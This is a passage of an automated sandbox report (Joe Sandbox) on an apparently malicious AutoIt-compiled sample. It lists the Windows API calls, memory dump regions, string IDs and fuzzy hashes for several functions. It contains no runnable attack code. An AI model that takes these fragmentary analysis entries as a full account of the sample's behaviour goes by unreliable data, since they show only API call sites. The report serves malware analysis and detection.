                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B04E1E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Internet$OpenOption
                                                              • String ID: <local>
                                                              • API String ID: 942729171-4266983199
                                                              • Opcode ID: db1ae14a8f5073e680798852930c041d16c985f1297af1bcc000db5598a10770
                                                              • Instruction ID: d2ad7abc0bdb53ba908125b6759ff7dad993e7593cba720d08c7bc595ab14486
                                                              • Opcode Fuzzy Hash: db1ae14a8f5073e680798852930c041d16c985f1297af1bcc000db5598a10770
                                                              • Instruction Fuzzy Hash: FA115EB0501221FADB298B51C8C9EFBFEE8FB16755F10826AF61556180D7709D50C6E0
                                                              APIs
                                                              • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00B0A84E
                                                              • htons.WSOCK32(00000000,?,00000000), ref: 00B0A88B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: htonsinet_addr
                                                              • String ID: 255.255.255.255
                                                              • API String ID: 3832099526-2422070025
                                                              • Opcode ID: 979e5325fd2e1e5cfa1277f79a0a237a9803b562cc010d912a15558b5075d878
                                                              • Instruction ID: 66cc7a1d811d9dab2487a585bde79c6138ae0233acb858cbdce36324b169bb0c
                                                              • Opcode Fuzzy Hash: 979e5325fd2e1e5cfa1277f79a0a237a9803b562cc010d912a15558b5075d878
                                                              • Instruction Fuzzy Hash: DB01F575200304ABCB209F68D886FADB7A4FF44720F20C9AAF5169B2D1DB71E806C752
                                                              APIs
                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00AB3DEE,00B71148,?,?,?,?,?,00AB3AA3,?), ref: 00AB6471
                                                              • _wcscat.LIBCMT ref: 00B25DDB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: FullNamePath_wcscat
                                                              • String ID: 0
                                                              • API String ID: 2109976907-3684773922
                                                              • Opcode ID: df4daac6c1e88cfe58474dd945ce801f50225d93c837edb26f24ddd5fa5826ee
                                                              • Instruction ID: ade61f845fe5b273f2ae518f0eefdadeca206bcce30129937b365a32ec7bb914
                                                              • Opcode Fuzzy Hash: df4daac6c1e88cfe58474dd945ce801f50225d93c837edb26f24ddd5fa5826ee
                                                              • Instruction Fuzzy Hash: 3F116132A04519AA8B40FBACCA42ECD77FCAF08344F1041A5B54DD7243EE7497889B61
                                                              APIs
                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00AEB7EF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3850602802-1403004172
                                                              • Opcode ID: 1246c8c72eb171d64cd207b9ecbf55f4889dbcb0fcab4f8108069d8a498aed4d
                                                              • Instruction ID: ede18d509a56a5b9b375c59523a5fef0fd1abe4cd1c227be8a00448330b03dcc
                                                              • Opcode Fuzzy Hash: 1246c8c72eb171d64cd207b9ecbf55f4889dbcb0fcab4f8108069d8a498aed4d
                                                              • Instruction Fuzzy Hash: 5B012F71611158ABDB04EBA4CD52EFE33BDBF46360B00061CF472A32D2EB749C088BA0
                                                              APIs
                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00AEB6EB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3850602802-1403004172
                                                              • Opcode ID: 8c35a1633987541287b898ae0ab04ca5bd9a94d1726e762300a5d601dc87e66b
                                                              • Instruction ID: a317c8fc7329692225ec8499896fc36cacaf55b15fb1cf7a104f08b879baab21
                                                              • Opcode Fuzzy Hash: 8c35a1633987541287b898ae0ab04ca5bd9a94d1726e762300a5d601dc87e66b
                                                              • Instruction Fuzzy Hash: 9301A275641044ABDB04EBA5CA57FFF73BC9F05344F100029B402B31D2DBA49E189BB5
                                                              APIs
                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00AEB76C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3850602802-1403004172
                                                              • Opcode ID: 95afcf4af0d80a1815f69fdebbe9f437625f275e3109e520e62fecac9ff48223
                                                              • Instruction ID: 1a1195a54e244e7e7f67e7991073f4accb81dff357fbe534ecb4aa7d143efbb6
                                                              • Opcode Fuzzy Hash: 95afcf4af0d80a1815f69fdebbe9f437625f275e3109e520e62fecac9ff48223
                                                              • Instruction Fuzzy Hash: 0F01D175A41144ABDB00EBA4CA03FFF73BC9B05340F100029B402B31E2DB649E199BB5
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ClassName_wcscmp
                                                              • String ID: #32770
                                                              • API String ID: 2292705959-463685578
                                                              • Opcode ID: 8aa6ad3bf20bb59dee8c74f33b85c36d8145076fe189320d6c1220dd336a90f4
                                                              • Instruction ID: 083f922ca4ed3fd18b3adf0a0da5ae4dfe3822e55bc357cb1ffcd99c6e4b336a
                                                              • Opcode Fuzzy Hash: 8aa6ad3bf20bb59dee8c74f33b85c36d8145076fe189320d6c1220dd336a90f4
                                                              • Instruction Fuzzy Hash: 90E02237A0422827D720AAA5EC0AE8BFBACAB51B60F000016F905D3041DA70A60087E0
                                                              APIs
                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00AEA63F
                                                                • Part of subcall function 00AD13F1: _doexit.LIBCMT ref: 00AD13FB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Message_doexit
                                                              • String ID: AutoIt$Error allocating memory.
                                                              • API String ID: 1993061046-4017498283
                                                              • Opcode ID: 4bba09daa8c100d6dff955c78c512a395187489f497f19d8aba98f5bb4ceb17d
                                                              • Instruction ID: 46df4561041f8bba4fef802bad4d902082ccb469a51faae6c934c1c255d74890
                                                              • Opcode Fuzzy Hash: 4bba09daa8c100d6dff955c78c512a395187489f497f19d8aba98f5bb4ceb17d
                                                              • Instruction Fuzzy Hash: 9FD05B313C4B1837D21437A97D17FC9758C8B55B95F14006AFB0CD95D24DE6965041D9
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?), ref: 00B2ACC0
                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00B2AEBD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: DirectoryFreeLibrarySystem
                                                              • String ID: WIN_XPe
                                                              • API String ID: 510247158-3257408948
                                                              • Opcode ID: b148c8423838afbe9da8dbbf6527faab24c8e05a42d5c04a6707508a0abc800f
                                                              • Instruction ID: 5e76f038ca9723eb6e50a023490d3f5b3dab0b61ceda210e49b55c25ac0f8318
                                                              • Opcode Fuzzy Hash: b148c8423838afbe9da8dbbf6527faab24c8e05a42d5c04a6707508a0abc800f
                                                              • Instruction Fuzzy Hash: B2E0ED70C00619DFCB11DBA9ED84AECB7F9EB48301F1481D5E11AB2560DB705A84DF22
                                                              APIs
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B186A2
                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00B186B5
                                                                • Part of subcall function 00AF7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AF7AD0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: FindMessagePostSleepWindow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 529655941-2988720461
                                                              • Opcode ID: 4baa4b9013a75530ccbe36369d2b27ae0d65d7897743f1a3a67a18349e58d6bf
                                                              • Instruction ID: 5c506d6ca901eb8b0c038ae3d4056f8bbb82b075714a74cbc4e2a706c72ca1a3
                                                              • Opcode Fuzzy Hash: 4baa4b9013a75530ccbe36369d2b27ae0d65d7897743f1a3a67a18349e58d6bf
                                                              • Instruction Fuzzy Hash: E9D01275784318B7E2647770AC0BFDE7E58AB14B11F210855F74AAB1D0CDE4E950C754
                                                              APIs
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B186E2
                                                              • PostMessageW.USER32(00000000), ref: 00B186E9
                                                                • Part of subcall function 00AF7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AF7AD0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: FindMessagePostSleepWindow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 529655941-2988720461
                                                              • Opcode ID: a2681251ced879962d66b4dbcf5698d0933e0a5af42fe84c66689ce0a90949e2
                                                              • Instruction ID: df255b2a5ff3240677f1440274d14c56130fbdca4d585a35df47c9728edc6529
                                                              • Opcode Fuzzy Hash: a2681251ced879962d66b4dbcf5698d0933e0a5af42fe84c66689ce0a90949e2
                                                              • Instruction Fuzzy Hash: 98D0C9717853186BE2646770AC0BFCA6A58AB14B11F610855B746AB1D0C9A4A9508754